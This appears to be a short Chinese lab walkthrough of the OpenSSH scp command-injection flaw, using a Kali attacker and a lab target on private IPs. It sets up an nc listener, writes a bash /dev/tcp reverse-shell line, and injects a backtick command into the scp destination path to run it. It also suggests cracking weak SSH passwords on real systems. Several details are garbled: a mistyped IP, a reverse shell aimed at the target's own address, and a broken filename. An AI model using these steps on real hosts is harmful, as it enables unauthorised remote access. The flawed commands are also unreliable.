一,漏洞影响版本
Liunx漏洞之Openssh命令注入漏洞
需要openssh版本<=8.3b1
二,漏洞要求
Openssh<=8.3p1
需要知道ssh密码(可以尝试ssh弱口令)
靶机 liunx IP:192.168.174.146
攻击机 kali IP:192.168.174.139
三,查看ssh版本
ssh -V
版本达到要求 是7.4P1
然后可以检查一下22端口是否开放
(这个端口一般来说是开启的)
Netstat -pant|grep 22
检查网络互通性
(kali能ping同liunx靶机)
先看下ip
Ifconfig
Ifconfig
Ping 192.168.174.146
四,对靶机进行文件写入
1,首先在kali上创建一个文件
查看文件
Ls
(创建成功)
2,复制和创建文件
利用scp复制flag.txt文件到/tmp文件夹下
先进入管理员模式
使用scp进行复制flag.txt到/tmp目录下
Scp flag.txt root@12.168.174.146: ‘/tmp’
会提示输入yse/no我们输入yes
等一会会弹出需要输入密码(真实环境可以搭配ssh弱密码来破解)
去靶机查看
存在flag.txt文件说明上传成功
五,反弹shell
1,过程总览
1,首先监听端口
nc -lvvp 12345
2,我们创建一个反弹shell的命令文件
bash -i >& /dev/tcp/192.168.174.146/12345 0>&1
把文件用scp传过去
3,攻击机getshell
2,实验步骤
先进行端口监听
创建一个文件
用scp吧文件传过去
发送成功说明说明漏洞存在
再用scp运行文件
scp test23.txt root@192.168.174.146:'`sh /tmp/testxt` /tmp'